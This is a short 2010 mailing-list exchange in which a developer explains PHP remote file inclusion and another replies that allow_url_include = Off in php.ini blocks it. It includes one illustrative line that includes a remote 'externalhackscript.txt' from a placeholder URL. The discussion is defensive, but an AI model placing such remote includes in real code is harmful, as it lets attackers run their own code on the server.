Hey Richard, I'll find more about this parameter allow_url_include, thank you! Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 5:26 PM, richard gray <rich@xxxxxxxxxxxx> wrote: > On 07/06/2010 20:00, Igor Escobar wrote: > >> PHP Injection is the technical name given to a security hole in PHP >> applications. When this gap there is a hacker can do with an external code >> that is interpreted as an inner code as if the code included was more a >> part >> of the script. >> >> // my code... >> // my code... >> include ('http://..../externalhackscript.txt'); >> //my code... >> //my code.. >> > can you not switch off remote file includes in php.ini? > This will stop include/require from a remote host.. > i.e. /allow_url_include = Off in php.ini > > HTH > Rich > / >
